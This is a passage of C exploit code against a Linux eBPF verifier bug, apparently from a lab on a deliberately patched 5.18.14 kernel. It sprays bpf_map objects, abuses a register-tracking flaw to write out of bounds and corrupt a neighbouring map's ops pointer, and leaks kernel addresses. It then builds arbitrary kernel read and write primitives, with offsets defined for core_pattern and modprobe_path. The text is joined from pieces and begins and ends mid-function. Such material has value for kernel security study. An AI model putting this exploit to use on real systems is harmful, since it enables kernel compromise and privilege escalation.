      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, 'a', 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

// fd of the sprayed bpf_map whose ops pointer got corrupted (0 if none found).
int corrupted_map_fd;
// Kernel address of that struct bpf_map, recovered by the probe below.
uint64_t bpf_map_addr;
// Probe every sprayed map to find the one whose ops pointer was shifted by
// make_corrupted_map(): on that map the update handler slot now points at the
// lookup handler, so calling map_update_elem returns the element pointer
// instead of 0. Each probe program stores that return value into mapfd's
// element; a non-zero readback reveals the corrupted map and, minus 0x110,
// the kernel address of its struct bpf_map. Healthy maps are closed.
// Fix vs. original: `val` is now zero-initialized — bpf_map_lookup's result
// was unchecked, so on failure the original compared an uninitialized local.
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    write(socks[1], "Hello", 5);

    uint64_t val = 0;  // stays 0 if the lookup below fails
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;  // keep the corrupted fd open for later use
    }

    close(cur_map_fd);
  }
}

// Arbitrary 8-byte kernel write primitive: writes `val` to kernel address
// `addr`. The first skb_load_bytes call is verifier-blinded (tracked len 0x1,
// runtime len 0x10): it overflows fp-0x20 and replaces the saved pointer at
// fp-0x18 with `addr` taken from packet bytes 8..15. The second call then
// copies packet bytes 0x10..0x17 (= `val`) to that attacker-chosen address.
// Return value is buf[0], a constant marker — callers ignore it.
uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
// Arbitrary 8-byte kernel read primitive: returns the qword at kernel address
// `addr`. As in aaw64(), the blinded skb_load_bytes (tracked len 0x1, runtime
// len 0x10) overwrites the saved slot at fp-0x18 — here holding the map
// element pointer — with `addr` from packet bytes 8..15. The program then
// calls map_update_elem with that address as the value pointer, copying 8
// kernel bytes into the map element, which userspace reads via bpf_map_lookup.
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

// Kernel address of the corrupted struct bpf_map (also set by the probe above).
uint64_t bpf_map_addr = 0;

// Driver: corrupt one sprayed map's ops pointer, locate it, print the leaked
// bpf_map address, then write the ops pointer back so the kernel stays
// stable. (Dropped the unused 64 KiB `verifier_log` stack buffer.)
int main() {
  srand(time(NULL));

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] bpf_map_addr: 0x%016lx\n", bpf_map_addr);

  puts("[*] Restore corrupted map...");
  // The corruption subtracted 8 from the low byte of ->ops (0xa0 - 8), so
  // adding 8 to the value read back restores the original pointer.
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}

Leak addr of JIT code using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handle the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

/* Show a prompt and block until the user sends a character on stdin. */
void get_enter_to_continue(const char* msg) {
  fputs(msg, stdout);
  fputc('\n', stdout);
  (void)getchar();
}

/* Report the failing call via errno and terminate the exploit. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);  /* exit status 255, matching the original convention */
}

/* Thin wrapper around the bpf(2) syscall; returns the raw syscall result. */
int bpf(int cmd, union bpf_attr* attrs) {
  long ret = syscall(__NR_bpf, cmd, attrs, sizeof(union bpf_attr));
  return (int)ret;
}

/* Create a single BPF array map with int keys; aborts on failure. */
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_type = BPF_MAP_TYPE_ARRAY;
  attr.key_size = sizeof(int);
  attr.value_size = val_size;
  attr.max_entries = max_entries;

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
/* Store *pval at map[key]; aborts on failure, returns bpf(2)'s result. */
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;

  int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
/* Read map[key] into *pval; returns bpf(2)'s raw result (negative on error). */
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;
  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// fd of the map whose first element is used as scratch storage (map_spray_fd[0x81]).
int mapfd;
// fds of the sprayed maps; one neighbour's ->ops pointer gets its low byte corrupted.
int map_spray_fd[0x100];
// Exploit the verifier's value-tracking bug to get an OOB write past a map
// element, and use it to partially overwrite the `ops` pointer of a
// (hopefully) adjacent sprayed struct bpf_map.
//
// The BPF program below convinces the verifier that the length passed to
// skb_load_bytes() is 1 while it is 0xf2 at runtime, so 0xf2 bytes of our
// packet are written into an 8-byte map element. The payload places a
// chosen 2-byte value at offset 0xf0, which — assuming the heap layout
// cooperates (TODO confirm on the target) — lands on the low bytes of a
// neighboring map's ops pointer.
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  // Spray struct bpf_map allocations so two end up adjacent.
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  // Arbitrary pick from the middle of the spray; presumably adjacent to
  // another sprayed map — works probabilistically.
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  // The element must hold 1 so the program's mask dance below resolves to
  // actual runtime value 1 where the verifier tracks "unknown".
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // At this point the verifier believes r8 == 0 while its runtime value
      // is 1; the multiply below amplifies that discrepancy into the length.
      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  // Attach the filter to one end of a socketpair; writing to the other end
